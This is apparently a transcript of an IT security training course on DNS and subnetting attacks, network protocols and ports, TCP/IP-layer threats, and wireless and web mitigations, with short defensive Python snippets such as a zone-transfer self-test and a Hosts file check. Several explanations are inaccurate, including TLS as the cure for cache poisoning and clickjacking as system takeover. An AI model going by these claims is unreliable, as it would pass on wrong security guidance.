Mitigations. [Video description ends]
We will now look at different types of DNS attacks and their mitigation methods. There are many different types of attacks that can happen on a DNS server. The very first one you should know about is DNS amplification. This is a type of Distributed Denial of Service attack, or DDoS attack.
In this type of attack, the attacker sends a small volume of packets to the DNS server, and those packets carry a spoofed source address, so the DNS server thinks the packets are coming from a legitimate IP address. In reality it is not; it is a spoofed source address, typically the address of the intended target. The DNS server, in turn, generates a high volume of response traffic and sends it to the target system. Now what happens is that because a large number of packets are being generated by the DNS server and sent to the target system, eventually the target system is unable to take the load and goes down.
How do you mitigate this type of attack? One, you need to put a method in place that can block packets with spoofed source addresses. There are a lot of firewalls that have this capability. You also need to ensure that the DNS servers are always updated with the latest patches and updates.
You need to also ensure that you only use the DNS servers that you know, which
means the legitimate DNS servers. So anybody can set up a DNS server. However,
that DNS server can only cause damage if your DNS server, which is the legitimate
DNS server, is going to replicate its data with the unknown DNS server.
So you have to ensure that your DNS server does not replicate zone data to
unknown DNS server. It should be replicating zone data only to the specific DNS
servers that it knows. [Video description begins] The following information is
displayed on screen: Use legitimate DNS servers and block the unnecessary
ones. [Video description ends]
Then you also have to ensure that you block open recursive resolvers, or relay servers. There are a lot of such servers out there, and you have to ensure that you are not interacting with the kind of relay servers that answer recursive queries for anyone. The next type of attack is DNS cache poisoning. In this type of attack, the attacker modifies the DNS cache, which means the DNS server will end up sending the traffic to a wrong destination.
So for example, suppose the DNS cache carries 1.1.1.1 as the IP address for microsoft.com. Now if the attacker modifies the cache and redirects the traffic for microsoft.com to another website, let's say linux.com, then when you type in microsoft.com, the traffic will be routed to linux.com. How do you mitigate this threat? You use the TLS protocol, which will ensure the traffic is encrypted, and you do not want your DNS to be an open DNS. So what you do is implement and utilize secure DNS, which will ensure the DNS cache does not get modified.
The next type of attack is unauthorized zone transfers. This type of attack can occur because your legitimate DNS server is configured to replicate its zone to any DNS server. [Video description begins] According to the slide, an
unauthorized zone transfer performs unauthorized zone transfers from a legitimate
DNS server. [Video description ends]
So now what you have to do to mitigate this attack is restrict the zone transfer only to the DNS servers that you know. So basically, instead of replicating the zone to any DNS server, you replicate the zone information only to the
known DNS servers. So for example, if your organization has only three DNS
servers, from the first DNS server, you should replicate the zone information only
to the remaining two.
Now if somebody sets up a DNS server and your DNS server is configured to
replicate to any DNS server, then you have a problem. Because your DNS server is
going to end up replicating zone data to the fourth DNS server that it finds. And of
course, one of the methods that you should follow is you should enable logging and
auditing on the DNS server. Any kind of suspicion that you have in the DNS or its
method of replication to the other DNS servers, that can be tracked using auditing
on the DNS server.
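One way to test your own servers for this exposure is to attempt a zone transfer yourself, for example with the dnspython library; the server address and zone name below are hypothetical placeholders, and a properly restricted server should refuse the transfer.

```python
# pip install dnspython
import dns.query
import dns.zone

DNS_SERVER = "192.0.2.10"    # hypothetical: one of your own DNS servers
ZONE_NAME = "example.com"    # hypothetical: a zone it hosts

try:
    zone = dns.zone.from_xfr(dns.query.xfr(DNS_SERVER, ZONE_NAME, timeout=5))
    print(f"Zone transfer succeeded: {len(zone.nodes)} names exposed - restrict AXFR!")
except Exception as exc:
    print(f"Zone transfer refused or failed (what a hardened server should do): {exc}")
```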
Then you have another type of DNS attack, which is called DNS pharming. In this type of attack, the attacker simply redirects a website's traffic to a malicious website. So for instance, if you type www.microsoft.com, instead of going to microsoft.com, your traffic is routed to another, malicious website.
Now how does this happen? Because either the attacker has modified your system's
Hosts file or he has modified the DNS configuration. Now when you send out a
request to a DNS server to access microsoft.com or any other website, the first
thing that is checked is the Hosts file on your system. If there is no IP address
mapping to the domain name, then the request is sent to the DNS server.
What if this type of configuration is modified in the Hosts file on your system? The
request will actually never go to the DNS server in that case. Your system will
simply read the Hosts file and then redirect the request to a malicious website.
How do you mitigate this attack? So you have to ensure the Hosts file on your
system and every other system on the network is marked as read-only, which
means it cannot be modified on the fly; you need to have administrative privileges
to modify that particular file. Then you have to ensure that you monitor the DNS configuration. You should not simply configure the DNS server and just leave it like that. You should not only monitor it, you should also review the logs to ensure everything is working as it should be.
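A small Python sketch along these lines can help you spot pharming-style tampering: it checks whether the Hosts file is writable by the current user and prints its active entries so unexpected mappings stand out. The Hosts file paths shown are the usual platform defaults and are assumptions about your environment.

```python
import os
import sys

# Default Hosts file location (assumption about the platform).
HOSTS = r"C:\Windows\System32\drivers\etc\hosts" if sys.platform == "win32" else "/etc/hosts"

# 1. Can the current (non-administrative) user write to it? Ideally this prints False.
print(f"{HOSTS} writable by this user: {os.access(HOSTS, os.W_OK)}")

# 2. List the active entries so an unexpected mapping (e.g. a bank or vendor
#    domain pointed at a strange IP) stands out during a review.
with open(HOSTS, "r", encoding="utf-8", errors="ignore") as f:
    for line in f:
        line = line.strip()
        if line and not line.startswith("#"):
            print("entry:", line)
```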
Then the next type of attack you have is DNS hijacking. In this type of attack,
attacker modifies the target's TCP/IP configuration and redirects the traffic to a
malicious website. So assume that the attack is happening on your system. In this
type of attack, attacker will modify the TCP/IP configuration and change the DNS
settings on your system and redirect the traffic to a malicious website.
Now how does the traffic get redirected to a malicious website? Because the DNS
configuration that has been changed has that particular IP address and domain
mapping. How do you mitigate this? You have to ensure that you deploy DNS
security, which is known as DNSSEC.
Types of Subnetting Attacks and Mitigations
[Video description begins] Topic title: Types of Subnetting Attacks and Mitigations.
Your host for this session is Ashish Chugh. [Video description ends]
Let's now look at the types of subnetting attacks and their mitigations. There are
essentially two types of attacks that can happen on a subnet. First one is called the
Smurf attack in which the attacker sends large number of ICMP requests to every
system on the network. [Video description begins] The following information is
displayed on screen: Sends large number of ICMP echo requests to every system on
a network. [Video description ends]
When you are talking about ICMP echo requests, these are the ping requests that are being sent to every system on the network. These ICMP requests carry a spoofed source IP address in the header, which means when the targets reply to each one of those ping requests, the responses are sent to the spoofed IP address, which is typically the address of the intended victim rather than the real sender. That is what the Smurf attack is.
How do you mitigate the Smurf attack? You have to divide your network into smaller networks, which means you divide it into smaller subnets. The fewer the systems in a particular subnet, the better control you have over them and the less affected they are by the Smurf attack. Because if you have a large, flat network and there is a Smurf attack, every single system will attempt to respond to the ICMP requests, or even go down.
Now if you have smaller subnets, only one subnet is the target; therefore, a smaller number of systems are affected. You can also configure the network firewall, or the firewall on each of the systems, not to respond to ICMP requests, which means that if a ping request or ICMP request is sent to a particular system, the firewall should block that request, and the attacker sending the request gets no useful reply. You should also configure network ingress filtering, so whatever is coming in, you filter out the spoofed traffic. A small subnetting sketch follows below.
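Python's standard ipaddress module makes the subnetting side of this mitigation easy to reason about; the sketch below splits a hypothetical /24 into four /26 subnets so a broadcast-based attack only reaches the hosts inside one smaller subnet.

```python
import ipaddress

# Hypothetical flat network with up to 254 hosts.
flat_network = ipaddress.ip_network("192.168.10.0/24")

# Split it into four /26 subnets; broadcast-driven attacks such as Smurf
# then only reach the hosts inside a single, smaller subnet.
for subnet in flat_network.subnets(new_prefix=26):
    print(subnet, "->", subnet.num_addresses - 2, "usable host addresses")
```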
And the next type of attack is local spoofing. In this type of attack, the victim and the attacker both exist on the same subnet. What the attacker does is sniff the traffic that is being sent by the victim. Now how do you block this type of attack? It can sometimes be difficult to do that, because both the attacker and the victim exist on the same subnet.
One of the methods that you can use is a secure protocol for sending the information: if you are sending traffic on the local network, you can use IPSec, and if you are sending traffic over the Internet or to a web application, you can encrypt the traffic by using HTTPS. [Video description begins] The information displayed on screen includes the following: Use secure protocols for sending information. [Video description ends]
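As a simple illustration of encrypting traffic in transit, here is a minimal TLS client using only Python's standard library; the host name is a placeholder, and the point is simply that a sniffer on the same subnet sees only ciphertext rather than the application data.

```python
import socket
import ssl

HOST = "www.example.com"                  # placeholder host
context = ssl.create_default_context()    # also verifies the server certificate

with socket.create_connection((HOST, 443), timeout=10) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname=HOST) as tls_sock:
        print("Negotiated protocol:", tls_sock.version())
        # Application data now travels encrypted, so a local sniffer sees ciphertext.
        request = b"GET / HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\nConnection: close\r\n\r\n"
        tls_sock.sendall(request)
        print(tls_sock.recv(200).decode(errors="ignore"))
```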
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of subnetting and how it relates to security. We also covered VMs and containers. We did this by covering the concept of subnetting and looking at tips and tricks in subnetting. Then we also looked at planning for VMs and containers. After this, we looked at DNS configuration. And finally, we covered some common attacks on subnetting and DNS.
In our next course, we will move on to explore the networking protocols and
importance of choosing an appropriate protocol. [Video description begins] The
following information is displayed on screen: Securing Networking
Protocols. [Video description ends]
Information Security: Securing Networking
Protocols
Learners can explore the key concept of the common protocols in use, and discover
the security issues of the transmission control protocol/Internet protocol (TCP/IP)
model and security protocols, in this 10-video course. You will begin by taking a
look at the common protocols used in a network, the ports they use, and the type
they are and what they do. Next, you will examine some of the security issues of
the TCP/IP model at the layer level, of which it has four: application, transport,
Internet, and data link. You will also explore the threats, vulnerabilities, and
mitigation techniques in network security; identify the types of weak protocols and
their replacements; and classify the various types of security protocols. Then
learners will continue by examining various ways to use security protocols in
different situations; the importance of implementing security protocols. In the final
tutorial, learners will explore the security-first mindset and its necessity.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh, an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh. I have more than 25 years of experience in IT
infrastructure operations, software development, cyber security, and e-learning. In
the past, I worked under different capacities in the IT industry. I've worked as a
Quality Assurance Team Leader, Technical Specialist, IT Operations Manager, and
Delivery Head for Software Development. Along with this, I've also worked as a Cyber Security Consultant. I have a Bachelor's Degree in Psychology and a Diploma in System Management. My areas of expertise are IT operations and process management. I have various certifications, which are Certified Network Defender, Certified Ethical Hacker, and Computer Hacking Forensic Investigator. Other than these certifications, I also have a few certifications from Microsoft, which are MCSE, MCSA, and MCP. I'm also a Certified Lotus Professional.
In this course, we will learn about the common networking protocols and their security vulnerabilities. We will also focus on the risks around certain networking protocols. Then, we will look at common security protocols and how they are used on a network. Finally, we'll also learn about the security-first mindset.
Common Protocols
[Video description begins] Topic title: Common Protocols. The presenter is Ashish
Chugh. [Video description ends]
When we talk about protocol, it is a method of doing something in a way which
two parties can understand. Similarly, in networking a protocol is a set of rules that
defines the communication between two or more devices. When you talk about a
protocol, it also defines the format of messages exchanged between two or more
devices. For example, let's talk about two human beings. One knows German, one
knows French. Now, they will not be able to communicate with each other unless
either both of them speak German or both of them speak French. Therefore, a
protocol works in the similar fashion on a network. Two devices that need to speak
to each other, they need to have a common protocol. Now this common protocol
could be anything. As long as both the devices are using the same one, they will be
able to communicate with each other. A protocol can be implemented either in software, in hardware, or in both. It is not necessary that only software can implement a protocol. Even two hardware devices, when they need to communicate, need to have a common protocol in use.
[Video description begins] Common Protocols. [Video description ends]
So let's now look at some of the common protocols and the ports they use, and the
type they are, and what they do. So first one is File Transfer Protocol, which is
FTP.
[Video description begins] The type for File Transfer Protocol is TCP and the port
is 20/21. It is used for transferring files between a server and a client. [Video
description ends]
FTP is a very common protocol that is mostly used for uploading and downloading files. So if you need to exchange files with multiple clients, you can simply set up an FTP server and upload the files. Users who have credentials to access the FTP server can then access those files. Or you could also enable anonymous authentication, which means anybody knowing the IP address or the FTP server name can connect to it and download the files. Then you have
something called Secure Shell, which is very commonly known as SSH. It is a TCP
type protocol. It works on port 22. And when you need to connect a remote session
with a system in a very secure way, which means that it needs to be encrypted, then
you can use SSH. Telnet, on the other hand, works in a similar fashion to SSH. However, it does not create an encrypted session; all the information that travels on the channels established by Telnet is in clear text format. Then we come to Simple
Mail Transfer Protocol, which is known as SMTP.
[Video description begins] The type for Telnet protocol is TCP and the port is 23. It
is used for establishing a remote connection to a device. [Video description ends]
It is a TCP type protocol, works on port 25, and it is mainly used for sending
emails. So when a client is sending an email, it is using SMTP. Then no network can work without DNS, unless it does not require name resolution at all. It is both a TCP and UDP type protocol, it works on port 53, and it is mainly used for name resolution. So for instance, if you type www.google.com, then there has to be a
mechanism which can translate this domain name into an IP address. That is the
role DNS plays. Then next comes the Dynamic Host Configuration Protocol, which
is the DHCP. It is a UDP type protocol, works on port 67/68. It uses both these
ports. One is for sending the request, another one is for receiving the IP address.
Then it is mainly used for distributing IP addresses on the network.
[Video description begins] The Dynamic Host Configuration Protocol is used for
leasing IP addresses to the clients on a network. [Video description ends]
Now you have to define a pool of IP addresses that can be leased out to the clients
on the network. Once the IP pool is exhausted, clients will not be able to obtain the
IP address. Therefore, whenever you create a DHCP server, you have to ensure that
there are enough IP addresses that can be leased out. Then comes the Trivial File
Transfer Protocol, which is known as TFTP. It is a UDP type protocol, works on
port 69. And it is mainly used for transferring files between two devices. And the
biggest thing about this protocol is you don't have to establish a session. So this is
commonly used with routers, switches where you have to upload a certain file
which could be their updates, or flash ROM file, or something like that. If you need
to upload it into routers and switches, you normally use TFTP.
Then comes the Hypertext Transfer Protocol, which is very commonly known as
HTTP. It is a TCP type protocol, works on port 80. And any time you would have
browsed a website, it is by default using a port 80. Unless you are using HTTPS,
which will use port 443. However, you do not have to suffix this particular port at
the end of the website name or the URL. Because the web browser, by default, if it
doesn't find a port number, it will assume that the request is being sent to port 80 if
HTTP is being used.
Post Office Protocol, which is known as POP. There have been several versions. The current version is version 3; there were versions 1 and 2 earlier. It is a TCP type protocol and works on port 110. It is mainly used for downloading emails from a messaging server. But once it downloads the emails, it deletes them from the messaging server.
Then comes the Network Time Protocol, which is known as NTP. It is a UDP type
protocol, works on port 123. And it is mainly used by all devices on a network to
synchronize their time with the NTP server. Now NTP server, your organization
can set it up internally on their network, or it could be a NTP server somewhere on
the Internet. There are open NTP servers which are being used to synchronize time
with.
Let's now talk about Internet Message Access Protocol, which is known as IMAP.
It is a TCP type protocol, uses port 143. And it is also used to download emails
from a messaging server. Now the difference between POP3 and IMAP is where
POP3 deletes the mails or the emails from the messaging server, IMAP does not do
that. It will retain one copy on the messaging server but also download one copy on
the client desktop or laptop. Then you have Simple Network Management Protocol,
which is known as SNMP. This is a TCP/UDP type protocol. It uses port 161 and
162. It is mainly used for monitoring devices on the network. Then you have the
Border Gateway Protocol, known as BGP.
[Video description begins] The Simple Network Management Protocol is used for
monitoring, configuring, and controlling network devices. [Video description ends]
It's a TCP type protocol. It uses port 179. And BGP is mainly used for maintaining
the routing tables on the Internet. Finally, we come to Lightweight Directory
Access Protocol, very commonly known as LDAP. It is a TCP/UDP type protocol and uses port 389. It is used to access a centralized repository that maintains information about users, computers, groups, and various other types of information. Active Directory is one of the most commonly known implementations of LDAP.
[Video description begins] The Lightweight Directory Access Protocol helps to
access and maintain distributed directory information. [Video description ends]
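If you want to double-check the port numbers listed above, Python's socket module can look them up in the operating system's local services database; exactly which names are present is an assumption about your platform, so any missing entries are handled gracefully.

```python
import socket

# Service names and the transport each commonly uses, matching the list above.
services = [("ftp", "tcp"), ("ssh", "tcp"), ("telnet", "tcp"), ("smtp", "tcp"),
            ("domain", "udp"),   # "domain" is the services-database name for DNS
            ("http", "tcp"), ("pop3", "tcp"), ("ntp", "udp"),
            ("imap", "tcp"), ("snmp", "udp"), ("ldap", "tcp")]

for name, proto in services:
    try:
        print(f"{name:8} {proto.upper():3} port {socket.getservbyname(name, proto)}")
    except OSError:
        print(f"{name:8} not listed in this machine's services database")
```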
Security Issues of TCP/IP Model
[Video description begins] Topic title: Security Issues of TCP/IP Model. The
presenter is Ashish Chugh. [Video description ends]
Now, moving ahead, we will also look at the security issues of the TCP/IP model.
Now, this TCP/IP model has four TCP/IP layers, which are application, transport,
internet, and data link. Each layer has certain number of protocols that work on it.
So for instance, on application layer, you have various protocols, and it has the
maximum number of protocols running. So some of these protocols are like DNS,
DHCP, TFTP, FTP. Just a while back we did talk about most of these protocols.
Then we come to the transport layer which is the TCP and UDP protocols.
[Video description begins] Application layer includes the following protocols:
DNS, DHCP, TFTP, FTP, HTTP, IMAP4, POP3, SMTP, SNMP, SSH, Telnet,
TLS/SSL. [Video description ends]
Moving on to Internet, it has two versions of IP which work here, which is IPv4
and IPv6. Other than that, you have ICMP protocol which is mainly used with the
ping command. Then you have IGMP, and the data link layer has the ARP
protocol.
[Video description begins] Security Issues of TCP/IP Model - Application
Layer. [Video description ends]
Let's now look at some of the security issues with the protocols that exist on the
application layer. So when you talk about HTTP, you have various type of security
issues ranging from caching, replay attack, cookie poisoning, session hijacking,
cross-site scripting. Now, we are not going to get into detail of every type of
security issue, but we will talk about at least one or two of them. So let's talk about session hijacking. It is also known as cookie hijacking, which is the method of exploiting a valid session to gain unauthorized access to information or a service. Then comes cross-site scripting, which is very commonly known as XSS. This is the type of attack in which the attacker injects malicious client-side scripts into web pages. These client-side scripts are basically intended to be downloaded onto the systems of users who have connected to that particular web page. When you come to
DNS, again, just like HTTP, there are various types of security issues. So let's talk about DNS cache poisoning.
[Video description begins] The various types of security issues with DNS are as
follows: DNS Spoofing, DNS ID Hijacking, DNS Cache Poisoning, DNS Flood
Attack, and Distributed Reflection Denial of Service(DRDos). [Video description
ends]
It is also known as DNS spoofing, in which an attacker alters the DNS records to
divert Internet traffic from legitimate DNS servers to the malicious DNS servers.
And the problem with this type of attack is it can spread from DNS server to DNS
server. That is because when the zone information is being replicated between one
or more DNS servers, then this type of attack can spread. Because you end up
copying invalid cache to the other servers. Let's now talk about the DNS flood attack, which is a type of denial of service attack in which an attacker sends a lot of requests to the DNS server until the DNS resources are consumed and the DNS server is exhausted and cannot serve anymore. Moving on, let's talk about FTP. Now, FTP has various types of attacks, just like HTTP and DNS. One is the FTP brute force attack, in which the passwords of FTP servers are brute forced so they can be revealed and the FTP servers can be accessed.
[Video description begins] The various types of security issues with FTP are as
follows: FTP Bounce Attack, FTP Brute Force Attack, Anonymous Authentication,
Directory Traversal Attack, and Dridex-based Malware Attack. [Video description
ends]
Then you have the directory traversal attack, in which an attacker gains access to credentials and accesses the restricted directories on the FTP server. Moving on, when you talk about Telnet, there is a sniffing attack.
[Video description begins] The various types of security issues with Telnet are as
follows: Sniffing, Brute Force Attack, and Denial of Service(Dos). [Video
description ends]
Telnet sends the traffic in clear text format, which means it can be easily intercepted and read by the attacker. This is the type of attack known as sniffing. Then again, it is also prone to denial of service attacks, or DoS. So those are a couple of the main security issues with the Telnet protocol. Then if you look at DHCP, again, there are various types of security issues with DHCP. One is DHCP starvation.
[Video description begins] The various types of security issues with DHCP are as
follows: DHCP Spoofing, DHCP Starvation, Rogue DHCP Server. [Video
description ends]
An attacker sends a lot of forged requests to the DHCP server to exhaust its IP pools, which means bogus or rogue requests are being sent to the DHCP server, and the DHCP server keeps leasing IP addresses until it runs out of addresses in its IP pool. Then comes the rogue DHCP server attack, in which an attacker or a user on the network sets up a DHCP server which starts to lease out IP addresses on the network. Now, there is already a legitimate DHCP server which has leased out IP addresses, and another, rogue DHCP server has come up. This rogue DHCP server will also start leasing out IP addresses to nearby clients, and eventually its reach will spread, so clients will start accepting IP addresses from this rogue DHCP pool.
[Video description begins] Security Issues of TCP/IP Model - Transport
Layer. [Video description ends]
When you talk about TCP, there is the SYN attack, which is a type of denial of service attack.
[Video description begins] The various types of security issues with TCP are as
follows: SYN Attack, TCP Land Attack, TCP Sequence Number Prediction, IP Half
Scan Attack, and TCP Sequence Number Generation Attack . [Video description
ends]
An attacker sends a large number of SYN requests to a server. The server attempts to respond to every single request and therefore runs out of resources and crashes or freezes. That is the outcome of the SYN attack. Now when you talk about the TCP land attack, it is a Layer 4 denial of service attack in which the attacker sends TCP SYN packets that are spoofed so that the source and destination IPs are the same. So when the attacker sends out the TCP SYN packets to a server, it sets the source and the destination address to be the same. When the server receives the request and attempts to respond, because the address the packet came from is the same as the address it was sent to, the server eventually gets confused, starts consuming resources, and eventually crashes. When you talk about UDP, there is the UDP flood.
[Video description begins] The various types of security issues with UDP are as
follows: UDP Flood, UDP Amplification, NTP Amplification, and Volume Based
Attack. [Video description ends]
It is a denial of service attack in which an attacker sends UDP packets to a server, and the result is the same: the packets are sent in large quantities, and eventually the server exhausts its resources and crashes or freezes. Then you have the NTP amplification attack. It is a distributed denial of service attack in which the attacker exploits an NTP server with UDP packets.
[Video description begins] Security Issues of TCP/IP Model - Internet
Layer. [Video description ends]
Then we come to IP. When you talk about HTTP flooding, it is a distributed denial
of service attack in which an attacker sends out a large number of HTTP requests to
attack a web server or a web application.
[Video description begins] The various types of security issues with IP are as
follows: SYN Attack, HTTP Flooding, IP Spoofing, Brute Force Attack, and
Clickjacking. [Video description ends]
Eventually, whichever one is being attacked attempts to respond to these requests and finally ends up exhausting its resources and crashing. Then you have the clickjacking attack, where an attacker embeds a malicious link which is hidden on the webpage. When the user clicks on the malicious link, the attacker can take control of their system. Moving on to ICMP.
[Video description begins] The various types of security issues with ICMP are as follows: Fraggle Attack, Smurf Attack, and ICMP Tunneling Attack. [Video description ends]
There is a smurf attack which is a distributed denial of service attack in which the
attacker, using multiple or several hundred bots, sends ICMP packets using a
spoofed IP address. So which means you have no way of getting back to the
attacker or tracing the attacker because every request is coming from a spoofed IP
address. Then you have IGMP, which is prone to distributed denial of service,
DDoS, attack.
[Video description begins] The various types of security issues with IGMP are as
follows: Distributed Denial of Service(DDos) and Multicast Routing. [Video
description ends]
Now DDoS is something which uses hundreds or thousands or even millions of bots, which are known as zombie systems, and they attack a particular server. Because the server is receiving requests from hundreds and thousands of bots from the Internet, it cannot handle those requests and eventually crashes.
[Video description begins] Security Issues of TCP/IP Model - Data Link
Layer. [Video description ends]
Now, moving on to ARP. When you talk about ARP, there is ARP spoofing and the related MAC address flooding attack, in which the attacker sends a large number of Ethernet frames with fake MAC addresses to a switch.
[Video description begins] The various types of security issues with ARP are as
follows: Connection Resetting, Man in the Middle (MITM), Packet Sniffing, Denial
of Service (DoS), ARP Cache Poisoning, MAC Address Flooding, and ARP
Spoofing. [Video description ends]
This eventually fills the switch's address table with the spoofed entries, and then the switch is not able to cater to legitimate requests.
Threats, Vulnerabilities, and Mitigation
[Video description begins] Topic title: Threats, Vulnerabilities, and Mitigation. The
presenter is Ashish Chugh. Threats and Mitigation - Wireless. [Video description
ends]
So not only the wired networks have threats and they have security issues, but it is
the wireless network which is also prone to multiple types of threats. And of course
then there are various types of mitigation methods that can be used. So let's now
look at some of these threats and how they can be mitigated. So first one is war
driving. So in this type of attack, you simply roam around in a car across the streets
and in the market and try to find an open wireless network that you can connect to.
So the mitigation method could be simply decrease the wireless range and hide the
SSID. Now, there is no guarantee hiding the SSID would work because there are
tools which can discover even the hidden SSIDs. But it can still work as a
mitigation method. Then you talk about war chalking. In this type of threat,
basically the attacker marks the area after SSID and its credentials are known. So
once the attacker has discovered, not only the SSID, but also the credentials,
basically the walls of that particular building are marked. So the attacker knows
this is where I've discovered a wireless network, and I know the credentials.
The mitigation method: the credentials were discovered because you were using a weak security protocol like WEP, so you have to use WPA2.
You can also enable MAC filtering. Now when you enable MAC filtering, it is a
simple thing. Only the MAC addresses that are embedded or that are added into the
wireless access point, they'll be able to connect to the wireless network. Then you
have to also disable SSID or hide the SSID. Moving on, WEP/WPA cracking, now
these both were weak security protocols. In fact, lot of wireless routers now don't
even support WEP. They support WPA and onwards, which is WPA2 and various
other protocols. But now when you talk about cracking WEP or WPA, you are
basically scanning and determining the pre-shared key. Which is nothing but the
password that has been set for the wireless network. To mitigate this, you have to
use strong encryption protocol such as WPA. And of course, along with that you
can also use complex passwords so they are not easy to determine, or they are not
easy to crack. When you talk about evil twin, you just simply set up a rogue access
point for the legitimate users.
[Video description begins] For Evil Twin you set up a rogue AP for the legitimate
users to sniff the data. [Video description ends]
Now, what happens is that when users find another access point with the same name as the one they have been connecting to, they're likely to get confused about which one is legitimate. So some people will simply try the evil twin access point, and once they connect, they will provide their username and password. And there you go, you are able to capture their credentials. How do you protect against this, or how do you mitigate this threat? You simply
implement something known as Wireless Intrusion Prevention System, which is
WIPS. Then comes the rogue access point. This is an access point which is
installed without the knowledge of the IT team. Now anybody could simply bring a
wireless access point, connect it to the Ethernet network or the wired network, and
it will start broadcasting its SSID. It's as simple as that. There are ways to mitigate that, such as enabling switch port tracing, doing mode scanning, or implementing an application known as a rogue detector. You can use different methods to detect a rogue access point.
Now let's look at some of the threats and mitigation methods for a wired network. The first one is the ICMP flood. In an ICMP flood, an attacker sends a large number of ICMP packets to a system or a server, which means the server or the system is receiving so many ICMP packets in quick succession that it is unable to respond to each and every packet. The system attempts to do that, but as a consequence it starts to exhaust its resources. Therefore, it is unable to handle all the requests and eventually crashes. So how do you mitigate this threat? You simply enable the firewall to block ICMP packets on the server or the device. Then there is
a denial of service and distributed denial of service type of threats. Now denial of
service is from one system to another system.
[Video description begins] DoS/DDos threat puts a system or network to a halt
after saturating its resources. [Video description ends]
But when you talk about distributed denial of service, there are hundreds or maybe thousands of systems focusing on one single server or system and sending a lot of packets at the same time. When you talk about one-to-one, only a limited number of packets will come, but when you talk about distributed denial of service, there are thousands of nodes sending requests to a single node, which means the power of that particular attack has multiplied a few thousand times. The server is unable to take that much load and eventually crashes. So how do you mitigate this? First, you baseline your network traffic. You see what the normal traffic pattern is and keep monitoring your network traffic to ensure that this pattern is not deviated from. And if there is a deviation which is alarming, then you know there is something that is not right.
You can also compare signatures of the incoming traffic. So there are applications
and there are hardware devices which can help you map the signature of the
incoming traffic. And once you know that it is not a common signature but an unidentified one, that means there is something wrong, so you can block that traffic. There are also anti-DoS and anti-DDoS devices available on the market which are designed to protect your network or servers from these types of threats. You can buy such a device, implement it on the network, and you will be able to protect your network or server. Then comes the Fraggle threat, in which the attacker sends spoofed UDP packets to a broadcast address targeting a system, a server, or a device. Now how do you mitigate this threat?
You simply disable the IP broadcast on the network and also enable the firewall to
block ICMP packets. Then there is buffer overflow, in which there is a malicious
code in an application which puts more data in the buffer that it can handle. So
when the buffer is filled, it is not able to cater to any of the requests on the system,
and eventually it causes the application to crash. So how do you mitigate that? You
have to detect vulnerabilities in the code. Because if there is a vulnerability in the
code, an attacker could have embedded something in the code which would have
caused the buffer overflow. Now let's look at the threats and mitigation methods of
web applications. So first one is injection.
In this attack, an attacker injects malicious code or a script into the web application. This is possible because the web application has vulnerabilities: the input is not sanitized, or the data being entered is not validated properly. The attacker can simply embed some data into a field and inject something that is not safe for the web application. When malicious code or a script is embedded into the web application, it can trigger a lot of unexpected actions that the application is not designed to handle. So you have to perform server-side validation, where any data that is sent from the web application to the backend must be checked on the server. And also, when a user is inputting something into a field, you have to validate it and then sanitize it if required. For instance, when you talk about validation, consider a telephone field where you expect the user to input a telephone number.
This particular field should not accept letters or other characters; it should only accept numbers. So if the user types any character other than a number, that input has not passed validation. If validation were in place, the application would prompt the user with a message like, this is not the correct input, you have to input numbers only. Then there is sanitization of the input data. For instance, if you are expecting the user to enter everything in capital letters and the user inputs something in lowercase, you can sanitize that and convert the lowercase letters into uppercase. This is just one example; there could be many other things that can be sanitized.
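As a rough illustration of those two steps, here is a small Python sketch; the field names and rules are hypothetical examples for this discussion, not taken from any particular application.

    # Server-side validation and sanitization sketch for two hypothetical fields.
    import re

    def validate_phone(value):
        """Accept only digits (optionally a leading +); reject everything else."""
        if not re.fullmatch(r"\+?\d{7,15}", value):
            raise ValueError("This is not the correct input. You have to input numbers only.")
        return value

    def sanitize_code(value):
        """Sanitize a field that is expected in capital letters: trim and uppercase it."""
        return value.strip().upper()

    print(validate_phone("+14165550123"))   # passes validation
    print(sanitize_code(" abc-123 "))       # sanitized to "ABC-123"
    # validate_phone("555-CALL-NOW") would raise ValueError and be rejected

The same checks should run on the server even if the browser also validates the form, because an attacker can bypass anything that runs only on the client.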
Let's talk about broken authentication. This is basically when an attacker brute forces an application or a web page to gain access to user credentials. Passwords are usually the output of these attacks. Once the passwords are gained, the attacker is able to use them, along with the user credentials, to get into the application. How do you mitigate that? You can implement multi-factor authentication, which means that not only does the user have to provide the password, but you also send a one-time password to the user. So along with the permanent password, there is a one-time password which is valid for maybe 15 minutes. The user has to provide the OTP as well, along with the password. Unless both of these match on the backend, the user is not granted access to the application.
And of course, other than simply requiring a password, you have to ensure that you enforce complex passwords. Users should not be using simple passwords such as password12345. So you have to make sure users are forced to use complex passwords. You can put a password policy on the domain controller, or you can implement password policies using your LDAP directory. Once the password policies are implemented, users will be forced to use complex passwords.
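In practice the policy is enforced centrally through the domain controller or LDAP directory as just described, but as a minimal sketch of what such a complexity check amounts to, here is a Python example; the specific rules (12 characters, mixed character classes) are assumptions chosen for illustration.

    # Illustrative password complexity check; real enforcement normally lives in
    # the domain or directory password policy rather than in application code.
    import re

    RULES = [
        (r".{12,}",  "at least 12 characters"),
        (r"[A-Z]",   "an uppercase letter"),
        (r"[a-z]",   "a lowercase letter"),
        (r"\d",      "a digit"),
        (r"[^\w\s]", "a special character"),
    ]

    def unmet_rules(password):
        """Return the list of rules the password fails; empty means acceptable."""
        return [label for pattern, label in RULES if not re.search(pattern, password)]

    print(unmet_rules("password12345"))      # fails the uppercase and special-character rules
    print(unmet_rules("C0mpl3x!Passw0rd"))   # [] -> meets this illustrative policy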
Now let's move on to sensitive data exposure. This happens when encryption keys are stolen, which means your private key is compromised, or when a man-in-the-middle attack occurs on a transmission of information that was being done in cleartext format. These are just two examples of how sensitive data can be exposed, but there are various other ways. For instance, giving access to somebody who doesn't need that particular access on a web server or a file server. How do you mitigate this kind of threat? First, avoid storing sensitive data unnecessarily. Your sensitive data should not be lying around in the open on some file server or web server; it has to be secured. If it does not require regular access, then you should back it up and store it in a safe area. And if it requires regular access by only a few individuals, then ensure that only those individuals have the appropriate access.
